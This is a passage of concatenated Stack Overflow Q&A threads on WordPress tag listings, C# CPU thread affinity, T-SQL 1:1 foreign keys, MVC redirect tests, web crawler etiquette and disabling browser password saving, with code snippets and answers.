Q: How do I list all Entries with a certain tag in Wordpress? I may just be missing this functionality, but does anyone know if there is a widget available: I need to list the subject for all the entries that are associated with a given tag. For example: I have 5 articles tagged with "Tutorial", I'd like to see a list as follows: * *Tutorial 1: Installing the app *Tutorial 2: Customizing *Tutorial 3: Advanced edits *Tutorial 4: User management Does functionality like this exist in wordpress already? A: If you are comfortable with hacking WP you can try adding to your sidebar with wp_list_pages, http://codex.wordpress.org/Template_Tags/wp_list_pages. Or there are plug-ins like Simple-Tags(http://wordpress.org/extend/plugins/simple-tags/) that help you manage your tags. The nice thing about WordPress is there are lots of plug-ins available that can add functionality that the base app does not have, a quick search for plug-ins for tags(http://wordpress.org/extend/plugins/search.php?q=tag) returned quite a list, sure it's a lot to dig through but that also helps you see what is available. A: So I found an article on using custom queries. I modified the script to pull a specific tag, in this case "Open Source". <?php $querystr = "SELECT wposts.* FROM $wpdb->posts wposts, $wpdb->terms wterms, $wpdb->term_relationships wterm_relationships, $wpdb->term_taxonomy wterm_taxonomy WHERE wterm_relationships.object_id = wposts.ID AND wterm_relationships.term_taxonomy_id = wterm_taxonomy.term_taxonomy_id AND wterms.term_id = wterm_taxonomy.term_id AND wterm_taxonomy.taxonomy = 'post_tag' AND wterms.name = 'Open Source' AND wposts.post_status = 'publish' AND wposts.post_type = 'post' ORDER BY wposts.post_date DESC"; $pageposts = $wpdb->get_results($querystr, OBJECT); ?> <?php if ($pageposts): ?> <?php foreach ($pageposts as $post): ?> <?php setup_postdata($post); ?> <a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title(); ?>"><?php the_title('<li>', '</li>'); ?></a> <?php endforeach; ?> <?php else : ?> <?php endif; ?> If you only want to list pages for one specific tag then this would work. However, say you wanted to give a listing of pages for each tag based on the current articles listed on the page. You might create an array of all the tags using the get_the_tags() function during The Loop and then use that array to dynamically generate the WHERE statement for the query. A: You can easily use get_posts to create an array of posts based on a set of parameters. It retrieves a list of recent posts or posts matching these criteria. In your case, I would like to show how to display your posts under a specific tag ( in your case, Tutorial ) by creating a short code, which can be easily used anywhere later on in your site. In your functions.php function shortcode_tag_t() { $uu_id=get_current_user_id(); $args = array( 'posts_per_page' => 10, 'tag' => 'Tutorial', 'post_type' => 'post', 'post_status' => 'publish' ); $posts_array = get_posts( $args ); foreach ( $posts_array as $post ) : setup_postdata( $post ); $url = get_permalink( $post ); /* the guid is not a reliable URL; use the permalink */ echo"<li><a href='".$url."'>" .$post->post_title."</a></li>"; endforeach; wp_reset_postdata(); } add_shortcode( 'your_shortcode_name', 'shortcode_tag_t' ); Now you have a list of 10 posts tagged under Tutorial. Echo the created short code wherever you want to display the list.
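For completeness, on recent WordPress versions the raw SQL above can also be replaced with WP_Query, which handles the tag taxonomy joins for you. A minimal sketch; the 'tutorial' slug is a placeholder for your own tag:

<?php
$tag_query = new WP_Query( array(
    'tag'            => 'tutorial', // tag slug to filter on
    'posts_per_page' => -1,         // -1 = all matching posts
) );

if ( $tag_query->have_posts() ) {
    echo '<ul>';
    while ( $tag_query->have_posts() ) {
        $tag_query->the_post();
        echo '<li><a href="' . get_permalink() . '">' . get_the_title() . '</a></li>';
    }
    echo '</ul>';
}
wp_reset_postdata(); // restore the global post data after a custom loop
?>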
{ "language": "en", "url": "https://stackoverflow.com/questions/32341", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "0" }
Q: How do I spawn threads on different CPU cores? Let's say I had a program in C# that did something computationally expensive, like encoding a list of WAV files into MP3s. Ordinarily I would encode the files one at a time, but let's say I wanted the program to figure out how many CPU cores I had and spin up an encoding thread on each core. So, when I run the program on a quad core CPU, the program figures out it's a quad core CPU, figures out there are four cores to work with, then spawns four threads for the encoding, each of which is running on its own separate CPU. How would I do this? And would this be any different if the cores were spread out across multiple physical CPUs? As in, if I had a machine with two quad core CPUs on it, are there any special considerations or are the eight cores across the two dies considered equal in Windows?
A: In the case of managed threads, the complexity of doing this is a degree greater than that of native threads. This is because CLR threads are not directly tied to a native OS thread. In other words, the CLR can switch a managed thread from native thread to native thread as it sees fit. The function Thread.BeginThreadAffinity is provided to place a managed thread in lock-step with a native OS thread. At that point, you could experiment with using native APIs to give the underlying native thread processor affinity. As everyone suggests here, this isn't a very good idea. In fact there is documentation suggesting that threads can receive less processing time if they are restricted to a single processor or core. You can also explore the System.Diagnostics.Process class. There you can find a function to enumerate a process' threads as a collection of ProcessThread objects. This class has methods to set ProcessorAffinity or even set a preferred processor -- not sure what that is. Disclaimer: I've experienced a similar problem where I thought the CPU(s) were under-utilized and researched a lot of this stuff; however, based on all that I read, it appeared that it wasn't a very good idea, as evidenced by the comments posted here as well. However, it's still interesting and a learning experience to experiment.
A: Don't bother doing that. Instead use the Thread Pool. The thread pool is a mechanism (actually a class) of the framework from which you can request a new thread. When you ask for a new thread it will either give you a new one or enqueue the work until a thread gets freed. In that way the framework is in charge of deciding whether it should create more threads or not, depending on the number of CPUs present. Edit: In addition, as has already been mentioned, the OS is in charge of distributing the threads among the different CPUs.
A: You can definitely do this by writing the routine inside your program. However you should not try to do it, since the operating system is the best candidate to manage this stuff. I mean, a user-mode program should not try to do it. However, sometimes it can be done (by really advanced users) to achieve load balancing and even to expose true multi-threaded multi-core problems (data races/cache coherence...), as different threads would truly be executing on different processors. Having said that, if you still want to achieve it, we can do it in the following way. I am providing the pseudo code for Windows, but it could easily be done on Linux as well.
#define MAX_CORE 256
processor_mask[MAX_CORE] = {0};
core_number = 0;
Call GetLogicalProcessorInformation();
// From here we calculate core_number and also populate the processor_mask[] array,
// which is used later on to run the different threads on different cores.
for(j = 0; j < THREAD_POOL_SIZE; j++)
    Call SetThreadAffinityMask(hThread[j], processor_mask[j]);
// hThread is the array of thread handles.
// If your number of threads is higher than the actual number of cores,
// you can reset the counter (j) once it reaches core_number.
After the above routine is called, the threads would always be executing in the following manner: Thread1 -> Core1 Thread2 -> Core2 Thread3 -> Core3 Thread4 -> Core4 Thread5 -> Core5 Thread6 -> Core6 Thread7 -> Core7 Thread8 -> Core8 Thread9 -> Core1 Thread10 -> Core2 ............... For more information, please refer to the manual/MSDN to learn more about these concepts.
A: You shouldn't have to worry about doing this yourself. I have multithreaded .NET apps running on dual-quad machines, and no matter how the threads are started, whether via the ThreadPool or manually, I see a nice even distribution of work across all cores.
A: Where each thread goes is generally handled by the OS itself... so generate 4 threads on a 4-core system and the OS will decide which cores to run each on, which will usually be 1 thread on each core.
A: It is the operating system's job to split threads across different cores, and it will do so automatically when your threads are using a lot of CPU time. Don't worry about that. As for finding out how many cores your user has, try Environment.ProcessorCount in C#.
A: You cannot do this, as only the operating system has the privileges to do it. If applications decided it themselves, it would be difficult to write them, because then you would also need to take care of inter-processor communication and critical sections; for each application you would have to create your own semaphores or mutexes, for which the operating system provides a common solution by handling scheduling itself.
A: It is not necessarily as simple as using the thread pool. By default, the thread pool allocates multiple threads for each CPU. Since every thread which gets involved in the work you are doing has a cost (task-switching overhead, use of the CPU's very limited L1, L2 and maybe L3 cache, etc...), the optimal number of threads to use is <= the number of available CPUs - unless each thread is requesting services from other machines, such as a highly scalable web service. In some cases, particularly those which involve more hard disk reading and writing than CPU activity, you can actually be better off with 1 thread than multiple threads. For most applications, and certainly for WAV and MP3 encoding, you should limit the number of worker threads to the number of available CPUs. Here is some C# code to find the number of CPUs:
int processors = 1;
string processorsStr = System.Environment.GetEnvironmentVariable("NUMBER_OF_PROCESSORS");
if (processorsStr != null)
    processors = int.Parse(processorsStr);
Unfortunately, it is not as simple as limiting yourself to the number of CPUs. You also have to take into account the performance of the hard disk controller(s) and disk(s). The only way you can really find the optimal number of threads is trial and error. This is particularly true when you are using hard disks, web services and such. With hard disks, you might be better off not using all four processors on your quad-processor CPU.
On the other hand, with some web services, you might be better off making 10 or even 100 requests per CPU.
A: Although I agree with most of the answers here, I think it's worth it to add a new consideration: Speedstep technology. When running a CPU-intensive, single-threaded job on a multi-core system, in my case a Xeon E5-2430 with 6 real cores (12 with HT) under Windows Server 2012, the job got spread out among all the 12 cores, using around 8.33% of each core and never triggering a speed increase. The CPU remained at 1.2 GHz. When I set the thread affinity to a specific core, it used ~100% of that core, causing the CPU to max out at 2.5 GHz, more than doubling the performance. This is the program I used, which just loops increasing a variable. When called with -a, it will set the affinity to core 1. The affinity part was based on this post.
using System;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Threading;

namespace Esquenta
{
    class Program
    {
        private static int numThreads = 1;
        static bool affinity = false;

        static void Main(string[] args)
        {
            if (args.Contains("-a"))
            {
                affinity = true;
            }
            if (args.Length < 1 || !int.TryParse(args[0], out numThreads))
            {
                numThreads = 1;
            }
            Console.WriteLine("numThreads:" + numThreads);
            for (int j = 0; j < numThreads; j++)
            {
                var param = new ParameterizedThreadStart(EsquentaP);
                var thread = new Thread(param);
                thread.Start(j);
            }
        }

        static void EsquentaP(object numero_obj)
        {
            int i = 0;
            DateTime ultimo = DateTime.Now;
            if (affinity)
            {
                Thread.BeginThreadAffinity();
                CurrentThread.ProcessorAffinity = new IntPtr(1);
            }
            try
            {
                while (true)
                {
                    i++;
                    if (i == int.MaxValue)
                    {
                        i = 0;
                        var lps = int.MaxValue / (DateTime.Now - ultimo).TotalSeconds / 1000000;
                        Console.WriteLine("Thread " + numero_obj + " " + lps.ToString("0.000") + " M loops/s");
                        ultimo = DateTime.Now;
                    }
                }
            }
            finally
            {
                Thread.EndThreadAffinity();
            }
        }

        [DllImport("kernel32.dll")]
        public static extern int GetCurrentThreadId();

        [DllImport("kernel32.dll")]
        public static extern int GetCurrentProcessorNumber();

        private static ProcessThread CurrentThread
        {
            get
            {
                int id = GetCurrentThreadId();
                return Process.GetCurrentProcess().Threads.Cast<ProcessThread>().Single(x => x.Id == id);
            }
        }
    }
}
And the results: the processor speed shown by Task Manager matched what CPU-Z reported (screenshots omitted).
A: One of the reasons you should not (as has been said) try to allocate this sort of stuff yourself is that you just don't have enough information to do it properly, particularly into the future with NUMA, etc. If you have a thread ready-to-run, and there's a core idle, the kernel will run your thread, don't worry.
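To tie the thread-pool advice together: on .NET 4 and later, the usual way to say "roughly one worker per core" without touching affinity at all is the Task Parallel Library. Below is a minimal sketch for the WAV-to-MP3 scenario from the question - Parallel.ForEach, ParallelOptions and Environment.ProcessorCount are real framework APIs, but EncodeWavToMp3 is a hypothetical placeholder for whatever encoder you actually call, and the C:\audio path is illustrative:
using System;
using System.IO;
using System.Threading.Tasks;

class BatchEncoder
{
    static void Main()
    {
        string[] wavFiles = Directory.GetFiles(@"C:\audio", "*.wav");

        // Cap the degree of parallelism at the number of logical cores;
        // the OS scheduler still decides which core each worker runs on.
        var options = new ParallelOptions
        {
            MaxDegreeOfParallelism = Environment.ProcessorCount
        };

        Parallel.ForEach(wavFiles, options, wav =>
        {
            EncodeWavToMp3(wav, Path.ChangeExtension(wav, ".mp3"));
        });
    }

    // Hypothetical stand-in for the actual CPU-heavy encoding work.
    static void EncodeWavToMp3(string wavPath, string mp3Path)
    {
        Console.WriteLine("Encoding {0} -> {1}", wavPath, mp3Path);
    }
}
This keeps the "how many cores?" question and the scheduling decision where the answers above suggest they belong: in the framework and the OS.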
{ "language": "en", "url": "https://stackoverflow.com/questions/32343", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "66" }
Q: 1:1 Foreign Key Constraints How do you specify that a foreign key constraint should be a 1:1 relationship in Transact-SQL? Is declaring the column UNIQUE enough? Below is my existing code.
CREATE TABLE [dbo].MyTable(
    [MyTableKey] INT IDENTITY(1,1) NOT FOR REPLICATION NOT NULL,
    [OtherTableKey] INT NOT NULL UNIQUE
        CONSTRAINT [FK_MyTable_OtherTable] FOREIGN KEY REFERENCES [dbo].[OtherTable]([OtherTableKey]),
    ...
    CONSTRAINT [PK_MyTable] PRIMARY KEY CLUSTERED
    (
        [MyTableKey] ASC
    ) WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY]
GO
A: A foreign key column with the UNIQUE and NOT NULL constraints that references a UNIQUE, NOT NULL column in another table creates a 1:(0|1) relationship, which is probably what you want. If there was a true 1:1 relationship, every record in the first table would have a corresponding record in the second table and vice-versa. In that case, you would probably just want to make one table (unless you needed some strange storage optimization).
A: You could declare the column to be both the primary key and a foreign key. This is a good strategy for "extension" tables that are used to avoid putting nullable columns into the main table.
A: @bosnic: You have a table CLIENT that has a 1:1 relationship with table SALES_OFFICE because, for example, the logic of your system says so. What your app logic says and what your data model says are 2 different things. There is nothing wrong with enforcing that relationship with your business logic code, but it has no place in the data model. Would you really incorporate the data of SALES_OFFICE into the CLIENT table? If every CLIENT has a unique SALES_OFFICE, and every SALES_OFFICE has a singular, unique CLIENT - then yes, they should be in the same table. We just need a better name. ;) And if other tables need to relate themselves to SALES_OFFICE? There's no reason to. Relate your other tables to CLIENT, since CLIENT has a unique SALES_OFFICE. And what about database normalization best practices and patterns? This is normalization. To be fair, SALES_OFFICE and CLIENT is obviously not a 1:1 relationship - it's 1:N. Hopefully, your SALES_OFFICE exists to serve more than 1 client, and will continue to exist (for a while, at least) without any clients. A more realistic example is SALES_OFFICE and ZIP_CODE. A SALES_OFFICE must have exactly 1 ZIP_CODE, and 2 SALES_OFFICEs - even if they have an equivalent ZIP_CODE - do not share the instance of a ZIP_CODE (so, changing the ZIP_CODE of 1 does not impact the other). Wouldn't you agree that ZIP_CODE belongs as a column in SALES_OFFICE?
A: Based on your code above, the unique constraint would be enough, given that for every primary key you have in the table, the UNIQUE-constrained column is also unique. Also, this assumes that in [OtherTable], the [OtherTableKey] column is the primary key of that table.
A: If there was a true 1:1 relationship, every record in the first table would have a corresponding record in the second table and vice-versa. In that case, you would probably just want to make one table (unless you needed some strange storage optimization). This is very incorrect. Let me give you an example. You have a table CLIENT that has a 1:1 relationship with table SALES_OFFICE because, for example, the logic of your system says so. Would you really incorporate the data of SALES_OFFICE into the CLIENT table? And if other tables need to relate themselves to SALES_OFFICE?
And what about database normalization best practices and patterns? A foreign key column with the UNIQUE and NOT NULL constraints that references a UNIQUE, NOT NULL column in another table creates a 1:(0|1) relationship, which is probably what you want. The first part of your answer is the right answer, without the second part - unless the data in the second table is really a kind of information that belongs to the first table and will never be used by other tables.
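To make the "extension table" suggestion above concrete, here is a minimal sketch in T-SQL (the table and column names are illustrative, not from the question): the extension table's primary key is itself a foreign key into the main table, so each main row can have at most one extension row - a 1:(0|1) relationship - and the key column is automatically both unique and NOT NULL:
CREATE TABLE [dbo].[OtherTableExtension](
    [OtherTableKey] INT NOT NULL,
    [RarelyUsedData] NVARCHAR(100) NULL,
    CONSTRAINT [PK_OtherTableExtension] PRIMARY KEY CLUSTERED ([OtherTableKey] ASC),
    CONSTRAINT [FK_OtherTableExtension_OtherTable] FOREIGN KEY ([OtherTableKey])
        REFERENCES [dbo].[OtherTable]([OtherTableKey])
)
GO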
{ "language": "en", "url": "https://stackoverflow.com/questions/32360", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "9" }
Q: Assert action redirected to correct action/route? How do I exercise an action to ensure it redirects to the correct action or route?
A:
public ActionResult Foo()
{
    // RedirectToAction takes the action name first, then the controller name,
    // so this redirects to /Products/Index
    return RedirectToAction("Index", "Products");
}

[Test]
public void foo_redirects_to_products_index()
{
    var controller = new BarController();
    var result = controller.Foo() as RedirectToRouteResult;
    if (result == null)
        Assert.Fail("should have redirected");
    Assert.That(result.RouteValues["controller"], Is.EqualTo("Products"));
    Assert.That(result.RouteValues["action"], Is.EqualTo("Index"));
}
{ "language": "en", "url": "https://stackoverflow.com/questions/32364", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "6" }
Q: What are the key considerations when creating a web crawler? I just started thinking about creating/customizing a web crawler today, and know very little about web crawler/robot etiquette. A majority of the writings on etiquette I've found seem old and awkward, so I'd like to get some current (and practical) insights from the web developer community. I want to use a crawler to walk over "the web" for a super simple purpose - "does the markup of site XYZ meet condition ABC?". This raises a lot of questions for me, but I think the two main questions I need to get out of the way first are: * *It feels a little "iffy" from the get go -- is this sort of thing acceptable? *What specific considerations should the crawler take to not upset people?
A: Obey robots.txt (and don't be too aggressive, as has been said already). You might want to think about your user-agent string - it's a good place to be up-front about what you're doing and how you can be contacted.
A: Besides WillDean's and Einar's good answers, I would really recommend you take the time to read about the meaning of the HTTP response codes, and what your crawler should do when encountering each one, since it will make a big difference to your performance, and to whether or not you are banned from some sites. Some useful links: HTTP/1.1: Status Code Definitions Aggregator client HTTP tests Wikipedia
A: Please be sure to include a URL in your user-agent string that explains who/what/why your robot is crawling.
A: Also do not forget to obey the bot meta tags: http://www.w3.org/TR/html4/appendix/notes.html#h-B.4.1.2 Another thing to think about - when spidering pages, don't be too hasty deciding things don't exist or have errors. Some pages are offline due to maintenance work or errors that are corrected within a short period.
A: All good points, the ones made here. You will also have to deal with dynamically-generated Java and JavaScript links, parameters and session IDs, escaping single and double quotes, failed attempts at relative links (using ../../ to go past the root directory), case sensitivity, frames, redirects, cookies.... I could go on for days, and kinda have. I have a Robots Checklist that covers most of this, and I'm happy to answer what I can. You should also think about using open-source robot crawler code, because it gives you a huge leg up on all these issues. I have a page on that as well: open source robot code. Hope that helps!
A: I'd say that it is very important to consider how much load you are causing. For instance, if your crawler requests every object of a single site, more or less at once, it might cause load problems for that particular site. In other words, make sure your crawler is not too aggressive.
A: It's perfectly acceptable to do - just make sure it only visits each page once per session. As you're technically creating a searchbot you must obey robots.txt and no-cache rules. People can still block your bot specifically if needed by blocking IPs. You're only looking for source code as far as I can tell, so you'll want to build something to follow <link>s for stylesheets and <script src="..."></script> for JavaScripts.
A: Load is a big consideration. Put limits on how often you crawl a particular site, and work out the most basic info you need to accomplish your goal. If you are looking for text, do not download all images - stuff like that.
Of course obey robots.txt, but also make sure your user-agent string includes accurate contact info and maybe a link to a web page describing what you are doing and how you do it. If a web admin sees a lot of requests from you and is curious, you might be able to answer a lot of questions with an informative web page.
A: You will need to add some capability to blacklist sites/domains or other things (IP ranges, ASN, etc) to avoid your spider getting bogged down with spam sites. You'll need to have an HTTP implementation with a lot of control over timeout and behaviour. Expect a lot of sites to send back invalid responses, huge responses, rubbish headers, or just leave the connection open indefinitely with no response, etc. Also don't trust a 200 status to mean "the page exists". Quite a large proportion of sites send back 200 for "Not found" or other errors, in my experience (along with a large HTML document).
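As a concrete illustration of the robots.txt advice above, here is a minimal sketch using only the Python standard library (the host, page URL and user-agent string are placeholders - note how the user agent carries a contact URL, as several answers recommend):
import urllib.robotparser

# Fetch and parse the target host's robots.txt once, then reuse the parser.
rp = urllib.robotparser.RobotFileParser()
rp.set_url("https://example.com/robots.txt")
rp.read()

user_agent = "MarkupCheckBot/1.0 (+https://example.com/bot-info)"
page = "https://example.com/some/page.html"

# Only request pages that the site's robots.txt allows for this user agent.
if rp.can_fetch(user_agent, page):
    print("allowed to crawl", page)
else:
    print("disallowed by robots.txt:", page)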
{ "language": "en", "url": "https://stackoverflow.com/questions/32366", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "11" }
Q: Disable browser 'Save Password' functionality One of the joys of working for a government healthcare agency is having to deal with all of the paranoia around dealing with PHI (Protected Health Information). Don't get me wrong, I'm all for doing everything possible to protect people's personal information (health, financial, surfing habits, etc.), but sometimes people get a little too jumpy. Case in point: One of our state customers recently found out that the browser provides the handy feature to save your password. We all know that it has been there for a while, that it is completely optional, and that it is up to the end user to decide whether or not it is a smart decision to use. However, there is a bit of an uproar at the moment and we are being asked to find a way to disable that functionality for our site. Question: Is there a way for a site to tell the browser not to offer to remember passwords? I've been around web development a long time but don't know that I have come across that before. Any help is appreciated.
A: Not really - the only thing you could realistically do is offer advice on the site; maybe, before their first time signing in, you could show them a form with information indicating that it is not recommended that they allow the browser to store the password. Then the user will immediately follow the advice, write down the password on a post-it note and tape it to their monitor.
A: In addition to autocomplete="off", use readonly onfocus="this.removeAttribute('readonly');" for the inputs whose form data you do not want remembered (username, password, etc.), as shown below:
<input type="text" name="UserName" autocomplete="off" readonly onfocus="this.removeAttribute('readonly');" >
<input type="password" name="Password" autocomplete="off" readonly onfocus="this.removeAttribute('readonly');" >
Tested on the latest versions of the major browsers, i.e. Google Chrome, Mozilla Firefox, Microsoft Edge, etc., and works like a charm.
A: What I have been doing is a combination of autocomplete="off" and clearing password fields using JavaScript/jQuery. jQuery example:
$(function() {
    $('#PasswordEdit').attr("autocomplete", "off");
    setTimeout('$("#PasswordEdit").val("");', 50);
});
By using setTimeout() you can wait for the browser to complete the field before you clear it; otherwise the browser will always autocomplete after you've cleared the field.
A: I had been struggling with this problem for a while, with a unique twist to the problem. Privileged users couldn't have the saved passwords work for them, but normal users needed it. This meant privileged users had to log in twice, the second time enforcing no saved passwords. With this requirement, the standard autocomplete="off" method doesn't work across all browsers, because the password may have been saved from the first login. A colleague found a solution: replace the password field, when it received focus, with a new password field, and then focus on the new password field (then hook up the same event handler). This worked (except it caused an infinite loop in IE6). Maybe there was a way around that, but it was causing me a migraine. Finally, I tried to just have the username and password outside of the form. To my surprise, this worked! It worked on IE6, and current versions of Firefox and Chrome on Linux. I haven't tested it further, but I suspect it works in most if not all browsers (but it wouldn't surprise me if there was a browser out there that didn't care if there was no form).
Here is some sample code, along with some jQuery to get it to work:
<input type="text" id="username" name="username"/>
<input type="password" id="password" name="password"/>
<form id="theForm" action="/your/login" method="post">
    <input type="hidden" id="hiddenUsername" name="username"/>
    <input type="hidden" id="hiddenPassword" name="password"/>
    <input type="submit" value="Login"/>
</form>
<script type="text/javascript" language="JavaScript">
$("#theForm").submit(function() {
    $("#hiddenUsername").val($("#username").val());
    $("#hiddenPassword").val($("#password").val());
});
$("#username,#password").keypress(function(e) {
    if (e.which == 13) {
        $("#theForm").submit();
    }
});
</script>
A: I'm not sure if it'll work in all browsers but you should try setting autocomplete="off" on the form. <form id="loginForm" action="login.cgi" method="post" autocomplete="off"> The easiest and simplest way to disable Form and Password storage prompts and prevent form data from being cached in session history is to use the autocomplete form element attribute with value "off". From https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion Some minor research shows that this works in IE too, but I'll leave no guarantees ;) @Joseph: If it's a strict requirement to pass XHTML validation with the actual markup (don't know why it would be though) you could theoretically add this attribute with JavaScript afterwards, but then users with JS disabled (probably a negligible amount of your userbase, or zero if your site requires JS) will still have their passwords saved. Example with jQuery: $('#loginForm').attr('autocomplete', 'off');
A: Well, it's a very old post, but still I will give my solution, which my team had been trying to achieve for a long time. We just added a new input type="password" field inside the form, wrapped it in a div and made the div hidden. Made sure that this div is before the actual password input. This worked for us and it didn't give any Save Password prompt. Plunk - http://plnkr.co/edit/xmBR31NQMUgUhYHBiZSg?p=preview HTML:
<form method="post" action="yoururl">
    <div class="hidden">
        <input type="password"/>
    </div>
    <input type="text" name="username" placeholder="username"/>
    <input type="password" name="password" placeholder="password"/>
</form>
CSS: .hidden {display:none;}
A: If autocomplete="off" is not working, remove the form tag and use a div tag instead, then pass the form values to the server using jQuery. This worked for me.
A: Because autocomplete="off" does not work for password fields, one must rely on JavaScript. Here's a simple solution based on answers found here. Add the attribute data-password-autocomplete="off" to your password field: <input type="password" data-password-autocomplete="off"> Include the following JS:
$(function(){
    $('[data-password-autocomplete="off"]').each(function() {
        $(this).prop('type', 'text');
        $('<input type="password"/>').hide().insertBefore(this);
        $(this).focus(function() {
            $(this).prop('type', 'password');
        });
    });
});
This solution works for both Chrome and FF.
A: This is my HTML code for the solution. It works for Chrome, Safari and Internet Explorer. I created a new font in which all characters appear as "●", then I use this font for my password text. Note: My font name is "passwordsecretregular".
<style type="text/css">
#login_parola {
    font-family: 'passwordsecretregular' !important;
    -webkit-text-security: disc !important;
    font-size: 22px !important;
}
</style>
<input type="text" class="w205 has-keyboard-alpha" name="login_parola" id="login_parola" onkeyup="checkCapsWarning(event)" onfocus="checkCapsWarning(event)" onblur="removeCapsWarning()" onpaste="return false;" maxlength="32"/>
A: Just so people realise - the 'autocomplete' attribute works most of the time, but power users can get around it using a bookmarklet. Having a browser save your passwords actually increases protection against keylogging, so possibly the safest option is to save passwords in the browser but protect them with a master password (at least in Firefox).
A: I have a workaround, which may help. You could make a custom font hack. So, make a custom font with all the characters as a dot / circle / star, for example. Use this as a custom font for your website. Check how to do this in Inkscape: how to make your own font. Then on your login form use:
<form autocomplete='off' ...>
    <input type="text" name="email" ...>
    <input type="text" name="password" class="password" autocomplete='off' ...>
    <input type=submit>
</form>
Then add your CSS:
@font-face {
    font-family: 'myCustomfont';
    src: url('myCustomfont.eot');
    src: url('myCustomfont?#iefix') format('embedded-opentype'),
         url('myCustomfont.woff') format('woff'),
         url('myCustomfont.ttf') format('truetype'),
         url('myCustomfont.svg#myCustomfont') format('svg');
    font-weight: normal;
    font-style: normal;
}
.password {
    font-family:'myCustomfont';
}
Pretty cross-browser compatible. I have tried IE6+, FF, Safari and Chrome. Just make sure that the .eot font that you convert does not get corrupted. Hope it helps?
A: The simplest way to solve this problem is to place INPUT fields outside the FORM tag and add two hidden fields inside the FORM tag. Then, in a submit event listener, before the form data gets submitted to the server, copy the values from the visible inputs to the invisible ones. Here's an example (you can't run it here, since the form action is not set to a real login script):
<!doctype html>
<html>
<head>
    <title>Login & Save password test</title>
    <meta charset="utf-8">
    <script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
</head>
<body>
    <!-- the following fields will show on page, but are not part of the form -->
    <input class="username" type="text" placeholder="Username" />
    <input class="password" type="password" placeholder="Password" />

    <form id="loginForm" action="login.aspx" method="post">
        <!-- the following two fields are part of the form, but are not visible -->
        <input name="username" id="username" type="hidden" />
        <input name="password" id="password" type="hidden" />
        <!-- standard submit button -->
        <button type="submit">Login</button>
    </form>

    <script>
        // attach an event listener which will get called just before the form data is sent to the server
        $('form').submit(function(ev) {
            // read the value from the visible INPUT and save it to the invisible one
            // ... so that it gets sent to the server
            $('#username').val($('.username').val());
            $('#password').val($('.password').val());
        });
    </script>
</body>
</html>
A: My JS (jQuery) workaround is to change the password input type to text on form submit. The password could become visible for a second, so I also hide the input just before that. I would rather not use this for login forms, but it is useful (together with autocomplete="off"), for example, inside the administration part of a website.
Try putting this inside a console (with jQuery), before you submit the form.
$('form').submit(function(event) {
    $(this).find('input[type=password]').css('visibility', 'hidden').attr('type', 'text');
});
Tested on Chrome 44.0.2403.157 (64-bit).
A: I tested lots of solutions: dynamic password field names, multiple password fields (invisible fake ones), changing the input type from "text" to "password", autocomplete="off", autocomplete="new-password"... but nothing solved it with recent browsers. To stop the password being remembered, I finally treated the password as a plain text input and "blurred" the text typed. It is less "safe" than a native password field, since selecting the typed text would show it as clear text, but the password is not remembered. It also depends on having JavaScript activated. You will have to estimate the risk of using the proposal below versus the browser's password-remember option. While password remembering can be managed (disabled per site) by the user, that's fine for a personal computer, not for a "public" or shared computer. In my case it's for an ERP running on shared computers, so I'll give my solution below a try.
<input style="background-color: rgb(239, 179, 196); color: black; text-shadow: none;" name="password" size="10" maxlength="30" onfocus="this.value='';this.style.color='black'; this.style.textShadow='none';" onkeypress="this.style.color='transparent'; this.style.textShadow='1px 1px 6px green';" autocomplete="off" type="text">
A: You can prevent the browser from matching the forms up by randomizing the name used for the password field on each show. Then the browser sees a password for the same URL, but can't be sure it's the same password. Maybe it's controlling something else. Update: note that this should be in addition to using autocomplete or other tactics, not a replacement for them, for the reasons indicated by others. Also note that this will only prevent the browser from auto-completing the password. It won't prevent it from storing the password in whatever level of arbitrary security the browser chooses to use.
A: The cleanest way is to use the autocomplete="off" tag attribute, but Firefox does not properly obey it when you switch fields with Tab. The only way you could stop this is to add a fake hidden password field which tricks the browser into populating the password there.
<input type="text" id="username" name="username"/>
<input type="password" id="prevent_autofill" autocomplete="off" style="display:none" tabindex="-1" />
<input type="password" id="password" autocomplete="off" name="password"/>
It is an ugly hack, because you change the browser behavior, which should be considered bad practice. Use it only if you really need it. Note: this will effectively stop password autofill, because FF will "save" the value of #prevent_autofill (which is empty) and will try to populate any saved passwords there, as it always uses the first type="password" input it finds in the DOM after the respective "username" input.
A: Use real two-factor authentication to avoid the sole dependency on passwords, which might be stored in many more places than the user's browser cache.
A: I have tested adding autocomplete="off" in the form tag in all major browsers. In fact, most people in the US are using IE8 so far.
* *IE8, IE9, IE10, Firefox and Safari work fine. The browser doesn't ask to save the password, and previously saved usernames & passwords are not populated.
*Chrome & IE11 do not support the autocomplete="off" feature.
*FF supports autocomplete="off",
but sometimes existing saved credentials are populated.
Updated on June 11, 2014
Finally, below is a cross-browser solution using JavaScript, and it works fine in all browsers. You need to remove the "form" tag from the login form. After client-side validation, put the credentials in a hidden form and submit it. Also, add two methods: one for validation, "validateAndLogin()", and another, "checkAndSubmit()", for listening for the Enter key in the textbox/password/button - because the login form no longer has a form tag, the Enter key would not otherwise submit it.
HTML
<form id="HiddenLoginForm" action="" method="post">
    <input type="hidden" name="username" id="hidden_username" />
    <input type="hidden" name="password" id="hidden_password" />
</form>
Username: <input type="text" name="username" id="username" onKeyPress="return checkAndSubmit(event);" />
Password: <input type="text" name="password" id="password" onKeyPress="return checkAndSubmit(event);" />
<input type="button" value="submit" onClick="return validateAndLogin();" onKeyPress="return checkAndSubmit(event);" />
Javascript
//For validation - you can modify as you like
function validateAndLogin(){
    var username = document.getElementById("username");
    var password = document.getElementById("password");

    if(username && username.value == ''){
        alert("Please enter username!");
        return false;
    }
    if(password && password.value == ''){
        alert("Please enter password!");
        return false;
    }

    document.getElementById("hidden_username").value = username.value;
    document.getElementById("hidden_password").value = password.value;
    document.getElementById("HiddenLoginForm").submit();
}
//For enter event
